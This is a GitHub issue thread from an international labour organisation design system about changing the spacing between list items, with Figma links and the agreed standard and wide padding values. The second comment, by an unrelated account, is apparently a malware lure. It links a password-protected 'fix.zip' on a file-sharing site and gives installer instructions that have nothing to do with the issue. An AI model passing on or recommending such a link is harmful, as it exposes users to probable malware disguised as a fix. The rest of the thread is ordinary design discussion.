### ISSUE TITLE
Update spacing within lists

### ISSUE THREAD

**Issue by inesdgomes** [international-labour-organization/designsystem#1180]
Update list component so it uses new typography spacing in the Foundations file. 
See comment here: https://www.figma.com/design/qr8jQnxqJkRJFQnVC5PmrB?node-id=1905-4#921545624

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by beatrizmartinmartins** [comment]
@inesdgomes done. Can you review it? I will update the templates as well now

**Comment by beatrizmartinmartins** [comment]
@inesdgomes Changed what we talked about during the meeting:

- Added the "long" and "short" version and included different paddings between them
- Changed the default paddings from 24 to 16px although on the long version is still 24px

See [here](https://www.figma.com/design/RRxsfLNxjoypKrfJg1EwJf/ILO-Components-Library?m=auto&node-id=563-4400&t=fL5D3MvkmHd4f0Pp-1)

**Comment by inesdgomes** [comment]
Thanks @beatrizmartinmartins.
@justintemps We need this change to spacing in lists. This is to improve readibility in lists with a lot of text. See similar solution here: https://design-system.service.gov.uk/styles/lists/

We now have two sizing options:
- Standard: 24px after the heading; 16px between list items;
- Wide: 24px after the heading; 24px between list items;
